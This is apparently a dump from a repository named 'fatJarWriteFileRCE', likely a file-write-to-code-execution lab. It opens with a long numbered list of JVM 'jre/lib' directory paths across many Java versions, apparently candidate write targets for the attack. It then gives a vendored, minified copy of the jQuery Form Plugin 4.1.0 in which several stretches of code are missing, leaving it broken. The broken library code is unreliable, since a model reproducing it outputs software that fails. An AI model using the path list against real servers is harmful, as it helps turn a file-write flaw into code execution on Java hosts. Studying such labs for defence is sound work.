/usr/lib/jvm/jdk-7-oracle-x64/jre/lib/ 263 | /usr/lib/jvm/jdk-8-oracle-x64/jre/lib/ 264 | /usr/lib/jvm/jre-6-oracle-x64/jre/lib/ 265 | /usr/lib/jvm/jre-7-oracle-x64/jre/lib/ 266 | /usr/lib/jvm/jre-8-oracle-x64/jre/lib/ 267 | /usr/lib/jvm/java-10-openjdk-amd64/lib/ 268 | /usr/lib/jvm/java-11-openjdk-amd64/lib/ 269 | /usr/lib/jvm/java-1.11.0-openjdk/jre/lib/ 270 | /usr/lib/jvm/java-1.12.0-openjdk/jre/lib/ 271 | /usr/lib/jvm/java-6-openjdk-i386/jre/lib/ 272 | /usr/lib/jvm/java-6-sun-1.6.0.16/jre/lib/ 273 | /usr/lib/jvm/java-6-sun-1.6.0.20/jre/lib/ 274 | /usr/lib/jvm/java-7-openjdk-i386/jre/lib/ 275 | /usr/lib/jvm/java-8-openjdk-i386/jre/lib/ 276 | /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/ 277 | /usr/lib/jvm/java-7-openjdk-amd64/jre/lib/ 278 | /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 279 | /usr/lib/jvm/java-1.6.0-oracle-x64/jre/lib/ 280 | /usr/lib/jvm/java-1.7.0-oracle-x64/jre/lib/ 281 | /usr/lib/jvm/java-1.8.0-oracle-x64/jre/lib/ 282 | /usr/lib/jvm/oracle-java6-jdk-amd64/jre/lib/ 283 | /usr/lib/jvm/oracle-java7-jdk-amd64/jre/lib/ 284 | /usr/lib/jvm/oracle-java8-jdk-amd64/jre/lib/ 285 | /usr/lib64/jvm/java-1.6.0-ibd-1.6.0/jre/lib/ 286 | /usr/lib64/jvm/java-1.6.0-ibm-1.6.0/jre/lib/ 287 | /usr/lib64/jvm/java-1.7.1-ibm-1.7.1/jre/lib/ 288 | /usr/lib/jvm/java-1.6.0-sun-1.6.0.11/jre/lib/ 289 | /usr/lib/jvm/java-1.6.0-openjdk-amd64/jre/lib/ 290 | /usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/lib/ 291 | /usr/lib/jvm/java-1.8.0-openjdk-amd64/jre/lib/ 292 | /usr/lib/jvm/jre-1.6.0-openjdk.x86_64/jre/lib/ 293 | /usr/lib/jvm/jre-1.7.0-openjdk.x86_64/jre/lib/ 294 | /usr/lib/jvm/jre-1.8.0-openjdk.x86_64/jre/lib/ 295 | /usr/lib/jvm/java-1.11.0-openjdk-amd64/jre/lib/ 296 | /usr/lib/jvm/jdk-8-oracle-arm-vfp-hflt/jre/lib/ 297 | /usr/lib64/jvm/java-1.6.0-openjdk-1.6.0/jre/lib/ 298 | /usr/lib64/jvm/java-1.7.0-openjdk-1.7.0/jre/lib/ 299 | /usr/lib64/jvm/java-1.8.0-openjdk-1.8.0/jre/lib/ 300 | /usr/lib/jvm/java-1.6.0-openjdk-1.6.0.0.x86_64/jre/lib/ 301 | 
/usr/lib/jvm/java-1.7.0-openjdk-1.8.0.0.x86_64/jre/lib/ 302 | /usr/lib/jvm/java-1.8.0-amazon-corretto.x86_64/jre/lib/ 303 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.0.x86_64/jre/lib/ 304 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.45.x86_64/jre/lib/ 305 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.65.x86_64/jre/lib/ 306 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.75.x86_64/jre/lib/ 307 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.79.x86_64/jre/lib/ 308 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.91.x86_64/jre/lib/ 309 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101.x86_64/jre/lib/ 310 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191.x86_64/jre/lib/ 311 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.el7.x86_64/jre/lib/ 312 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-3.b17.el7.x86_64/jre/lib/ 313 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-4.b14.el7.x86_64/jre/lib/ 314 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-2.b14.el7.x86_64/jre/lib/ 315 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.el7.x86_64/jre/lib/ 316 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-11.b12.el7.x86_64/jre/lib/ 317 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-1.b13.el6_6.x86_64/jre/lib/ 318 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.el7_1.x86_64/jre/lib/ 319 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.el6_7.x86_64/jre/lib/ 320 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.el7_2.x86_64/jre/lib/ 321 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.el7_2.x86_64/jre/lib/ 322 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-1.b14.el7_2.x86_64/jre/lib/ 323 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-0.b15.el6_8.x86_64/jre/lib/ 324 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.el7_2.x86_64/jre/lib/ 325 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-2.b15.el7_3.x86_64/jre/lib/ 326 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.el7_3.x86_64/jre/lib/ 327 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-0.b11.el6_9.x86_64/jre/lib/ 328 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.el7_3.x86_64/jre/lib/ 329 | 
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-3.b12.el7_3.x86_64/jre/lib/ 330 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.el7_3.x86_64/jre/lib/ 331 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-3.b16.el6_9.x86_64/jre/lib/ 332 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el6_9.x86_64/jre/lib/ 333 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el7_4.x86_64/jre/lib/ 334 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el6_9.x86_64/jre/lib/ 335 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el7_4.x86_64/jre/lib/ 336 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-5.b12.el7_4.x86_64/jre/lib/ 337 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.el7_4.x86_64/jre/lib/ 338 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-3.b14.el6_9.x86_64/jre/lib/ 339 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-3.b10.el6_9.x86_64/jre/lib/ 340 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.amzn2.x86_64/jre/lib/ 341 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el6_9.x86_64/jre/lib/ 342 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64/jre/lib/ 343 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.amzn2.x86_64/jre/lib/ 344 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el7_5.x86_64/jre/lib/ 345 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.amzn2.x86_64/jre/lib/ 346 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre/lib/ 347 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-1.el7_6.x86_64/jre/lib/ 348 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.amzn2.x86_64/jre/lib/ 349 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-2.el7_6.x86_64/jre/lib/ 350 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el7_6.x86_64/jre/lib/ 351 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222.b10-0.el7_6.x86_64/jre/lib/ 352 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/ 353 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el6_10.x86_64/jre/lib/ 354 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64/jre/lib/ 355 | 
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el6_10.x86_64/jre/lib/ 356 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.x86_64/jre/lib/ 357 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.x86_64/jre/lib/ 358 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.x86_64/jre/lib/ 359 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.el7_2.x86_64/jre/lib/ 360 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.el7_3.x86_64/jre/lib/ 361 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.x86_64/jre/lib/ 362 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.el7_3.x86_64/jre/lib/ 363 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre/lib/ 364 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.el7_5.x86_64/jre/lib/ 365 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.x86_64/jre/lib/ 366 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.x86_64/jre/lib/ 367 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.x86_64/jre/lib/ 368 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.x86_64/jre/lib/ 369 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.x86_64/jre/lib/ 370 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.x86_64/jre/lib/ 371 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.x86_64/jre/lib/ 372 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.x86_64/jre/lib/ 373 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.x86_64/jre/lib/ 374 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.x86_64/jre/lib/ 375 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.43.amzn1.x86_64/jre/lib/ 376 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.x86_64/jre/lib/ 377 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64-debug/jre/lib/ 378 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.x86_64/jre/lib/ 379 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64-debug/jre/lib/ 380 | 
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64-debug/jre/lib/ 381 | 382 | ``` 383 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/static/jquery.form.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * jQuery Form Plugin 3 | * version: 4.1.0 4 | * Requires jQuery v1.7 or later 5 | * Copyright 2017 Kevin Morris 6 | * Copyright 2006 M. Alsup 7 | * Project repository: https://github.com/jquery-form/form 8 | * Dual licensed under the MIT and LGPLv3 licenses. 9 | * https://github.com/jquery-form/form#license 10 | */ 11 | !function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof module&&module.exports?module.exports=function(b,c){return void 0===c&&(c="undefined"!=typeof window?require("jquery"):require("jquery")(b)),a(c),c}:a(jQuery)}(function(a){"use strict";function b(b){var c=b.data;b.isDefaultPrevented()||(b.preventDefault(),a(b.target).closest("form").ajaxSubmit(c))}function c(b){var c=b.target,d=a(c);if(!d.is("[type=submit],[type=image]")){var e=d.closest("[type=submit]");if(0===e.length)return;c=e[0]}var f=c.form;if(f.clk=c,"image"===c.type)if(void 0!==b.offsetX)f.clk_x=b.offsetX,f.clk_y=b.offsetY;else if("function"==typeof a.fn.offset){var g=d.offset();f.clk_x=b.pageX-g.left,f.clk_y=b.pageY-g.top}else f.clk_x=b.pageX-c.offsetLeft,f.clk_y=b.pageY-c.offsetTop;setTimeout(function(){f.clk=f.clk_x=f.clk_y=null},100)}function d(){if(a.fn.ajaxSubmit.debug){var b="[jquery.form] "+Array.prototype.join.call(arguments,"");window.console&&window.console.log?window.console.log(b):window.opera&&window.opera.postError&&window.opera.postError(b)}}var e={};e.fileapi=void 0!==a('').get(0).files,e.formdata=void 0!==window.FormData;var f=!!a.fn.prop;a.fn.attr2=function(){if(!f)return this.attr.apply(this,arguments);var a=this.prop.apply(this,arguments);return a&&a.jquery||"string"==typeof 
a?a:this.attr.apply(this,arguments)},a.fn.ajaxSubmit=function(b,c,g,h){function i(c){var d,e,f=a.param(c,b.traditional).split("&"),g=f.length,h=[];for(d=0;d',z).val(k.extraData[j].value).appendTo(x)[0]):i.push(a('',z).val(k.extraData[j]).appendTo(x)[0]));k.iframeTarget||p.appendTo(A),q.attachEvent?q.attachEvent("onload",h):q.addEventListener("load",h,!1),setTimeout(b,15);try{x.submit()}catch(a){var m=document.createElement("form").submit;m.apply(x)}}finally{x.setAttribute("action",f),x.setAttribute("enctype",g),c?x.setAttribute("target",c):o.removeAttr("target"),a(i).remove()}}function h(b){if(!r.aborted&&!F){if(E=e(q),E||(d("cannot access response document"),b=2),1===b&&r)return r.abort("timeout"),void y.reject(r,"timeout");if(2===b&&r)return r.abort("server abort"),void y.reject(r,"error","server abort");if(E&&E.location.href!==k.iframeSrc||v){q.detachEvent?q.detachEvent("onload",h):q.removeEventListener("load",h,!1);var c,f="success";try{if(v)throw"timeout";var g="xml"===k.dataType||E.XMLDocument||a.isXMLDoc(E);if(d("isXml="+g),!g&&window.opera&&(null===E.body||!E.body.innerHTML)&&--G)return d("requeing onLoad callback, DOM not available"),void setTimeout(h,250);var i=E.body?E.body:E.documentElement;r.responseText=i?i.innerHTML:null,r.responseXML=E.XMLDocument?E.XMLDocument:E,g&&(k.dataType="xml"),r.getResponseHeader=function(a){return{"content-type":k.dataType}[a.toLowerCase()]},i&&(r.status=Number(i.getAttribute("status"))||r.status,r.statusText=i.getAttribute("statusText")||r.statusText);var j=(k.dataType||"").toLowerCase(),l=/(json|script|text)/.test(j);if(l||k.textarea){var n=E.getElementsByTagName("textarea")[0];if(n)r.responseText=n.value,r.status=Number(n.getAttribute("status"))||r.status,r.statusText=n.getAttribute("statusText")||r.statusText;else if(l){var 
o=E.getElementsByTagName("pre")[0],s=E.getElementsByTagName("body")[0];o?r.responseText=o.textContent?o.textContent:o.innerText:s&&(r.responseText=s.textContent?s.textContent:s.innerText)}}else"xml"===j&&!r.responseXML&&r.responseText&&(r.responseXML=H(r.responseText));try{D=J(r,j,k)}catch(a){f="parsererror",r.error=c=a||f}}catch(a){d("error caught: ",a),f="error",r.error=c=a||f}r.aborted&&(d("upload aborted"),f=null),r.status&&(f=r.status>=200&&r.status<300||304===r.status?"success":"error"),"success"===f?(k.success&&k.success.call(k.context,D,"success",r),y.resolve(r.responseText,"success",r),m&&a.event.trigger("ajaxSuccess",[r,k])):f&&(void 0===c&&(c=r.statusText),k.error&&k.error.call(k.context,r,f,c),y.reject(r,"error",c),m&&a.event.trigger("ajaxError",[r,k,c])),m&&a.event.trigger("ajaxComplete",[r,k]),m&&!--a.active&&a.event.trigger("ajaxStop"),k.complete&&k.complete.call(k.context,r,f),F=!0,k.timeout&&clearTimeout(w),setTimeout(function(){k.iframeTarget?p.attr("src",k.iframeSrc):p.remove(),r.responseXML=null},100)}}}var i,j,k,m,n,p,q,r,t,u,v,w,x=o[0],y=a.Deferred();if(y.abort=function(a){r.abort(a)},c)for(j=0;j',z),p.css({position:"absolute",top:"-1000px",left:"-1000px"})),q=p[0],r={aborted:0,responseText:null,responseXML:null,status:0,statusText:"n/a",getAllResponseHeaders:function(){},getResponseHeader:function(){},setRequestHeader:function(){},abort:function(b){var c="timeout"===b?"timeout":"aborted";d("aborting upload... 
"+c),this.aborted=1;try{q.contentWindow.document.execCommand&&q.contentWindow.document.execCommand("Stop")}catch(a){}p.attr("src",k.iframeSrc),r.error=c,k.error&&k.error.call(k.context,r,c,b),m&&a.event.trigger("ajaxError",[r,k,c]),k.complete&&k.complete.call(k.context,r,c)}},m=k.global,m&&0==a.active++&&a.event.trigger("ajaxStart"),m&&a.event.trigger("ajaxSend",[r,k]),k.beforeSend&&k.beforeSend.call(k.context,r,k)===!1)return k.global&&a.active--,y.reject(),y;if(r.aborted)return y.reject(),y;(t=x.clk)&&(u=t.name)&&!t.disabled&&(k.extraData=k.extraData||{},k.extraData[u]=t.value,"image"===t.type&&(k.extraData[u+".x"]=x.clk_x,k.extraData[u+".y"]=x.clk_y));var B=a("meta[name=csrf-token]").attr("content"),C=a("meta[name=csrf-param]").attr("content");C&&B&&(k.extraData=k.extraData||{},k.extraData[C]=B),k.forceSync?g():setTimeout(g,10);var D,E,F,G=50,H=a.parseXML||function(a,b){return window.ActiveXObject?(b=new ActiveXObject("Microsoft.XMLDOM"),b.async="false",b.loadXML(a)):b=(new DOMParser).parseFromString(a,"text/xml"),b&&b.documentElement&&"parsererror"!==b.documentElement.nodeName?b:null},I=a.parseJSON||function(a){return window.eval("("+a+")")},J=function(b,c,d){var e=b.getResponseHeader("content-type")||"",f=("xml"===c||!c)&&e.indexOf("xml")>=0,g=f?b.responseXML:b.responseText;return f&&"parsererror"===g.documentElement.nodeName&&a.error&&a.error("parsererror"),d&&d.dataFilter&&(g=d.dataFilter(g,c)),"string"==typeof g&&(("json"===c||!c)&&e.indexOf("json")>=0?g=I(g):("script"===c||!c)&&e.indexOf("javascript")>=0&&a.globalEval(g)),g};return y}if(!this.length)return d("ajaxSubmit: skipping submit process - no element selected"),this;var l,m,n,o=this;"function"==typeof b?b={success:b}:"string"==typeof b||b===!1&&arguments.length>0?(b={url:b,data:c,dataType:g},"function"==typeof h&&(b.success=h)):void 0===b&&(b={}),l=b.type||this.attr2("method"),m=b.url||this.attr2("action"),n="string"==typeof 
m?a.trim(m):"",n=n||window.location.href||"",n&&(n=(n.match(/^([^#]+)/)||[])[1]),b=a.extend(!0,{url:n,success:a.ajaxSettings.success,type:l||a.ajaxSettings.type,iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank"},b);var p={};if(this.trigger("form-pre-serialize",[this,b,p]),p.veto)return d("ajaxSubmit: submit vetoed via form-pre-serialize trigger"),this;if(b.beforeSerialize&&b.beforeSerialize(this,b)===!1)return d("ajaxSubmit: submit aborted via beforeSerialize callback"),this;var q=b.traditional;void 0===q&&(q=a.ajaxSettings.traditional);var r,s=[],t=this.formToArray(b.semantic,s,b.filtering);if(b.data){var u=a.isFunction(b.data)?b.data(t):b.data;b.extraData=u,r=a.param(u,q)}if(b.beforeSubmit&&b.beforeSubmit(t,this,b)===!1)return d("ajaxSubmit: submit aborted via beforeSubmit callback"),this;if(this.trigger("form-submit-validate",[t,this,b,p]),p.veto)return d("ajaxSubmit: submit vetoed via form-submit-validate trigger"),this;var v=a.param(t,q);r&&(v=v?v+"&"+r:r),"GET"===b.type.toUpperCase()?(b.url+=(b.url.indexOf("?")>=0?"&":"?")+v,b.data=null):b.data=v;var w=[];if(b.resetForm&&w.push(function(){o.resetForm()}),b.clearForm&&w.push(function(){o.clearForm(b.includeHidden)}),!b.dataType&&b.target){var x=b.success||function(){};w.push(function(c){var d=b.replaceTarget?"replaceWith":"html";a(b.target)[d](c).each(x,arguments)})}else b.success&&(a.isArray(b.success)?a.merge(w,b.success):w.push(b.success));if(b.success=function(a,c,d){for(var e=b.context||this,f=0,g=w.length;f0,C="multipart/form-data",D=o.attr("enctype")===C||o.attr("encoding")===C,E=e.fileapi&&e.formdata;d("fileAPI :"+E);var F,G=(B||D)&&!E;b.iframe!==!1&&(b.iframe||G)?b.closeKeepAlive?a.get(b.closeKeepAlive,function(){F=k(t)}):F=k(t):F=(B||D)&&E?j(t):a.ajax(b),o.removeData("jqxhr").data("jqxhr",F);for(var H=0;H0)&&(e={url:e,data:f,dataType:g},"function"==typeof h&&(e.success=h)),e=e||{},e.delegation=e.delegation&&a.isFunction(a.fn.on),!e.delegation&&0===this.length){var 
i={s:this.selector,c:this.context};return!a.isReady&&i.s?(d("DOM not ready, queuing ajaxForm"),a(function(){a(i.s,i.c).ajaxForm(e)}),this):(d("terminating; zero elements found by selector"+(a.isReady?"":" (DOM not ready)")),this)}return e.delegation?(a(document).off("submit.form-plugin",this.selector,b).off("click.form-plugin",this.selector,c).on("submit.form-plugin",this.selector,e,b).on("click.form-plugin",this.selector,e,c),this):this.ajaxFormUnbind().on("submit.form-plugin",e,b).on("click.form-plugin",e,c)},a.fn.ajaxFormUnbind=function(){return this.off("submit.form-plugin click.form-plugin")},a.fn.formToArray=function(b,c,d){var f=[];if(0===this.length)return f;var g,h=this[0],i=this.attr("id"),j=b||void 0===h.elements?h.getElementsByTagName("*"):h.elements;if(j&&(j=a.makeArray(j)),i&&(b||/(Edge|Trident)\//.test(navigator.userAgent))&&(g=a(':input[form="'+i+'"]').get(),g.length&&(j=(j||[]).concat(g))),!j||!j.length)return f;a.isFunction(d)&&(j=a.map(j,d));var k,l,m,n,o,p,q;for(k=0,p=j.length;k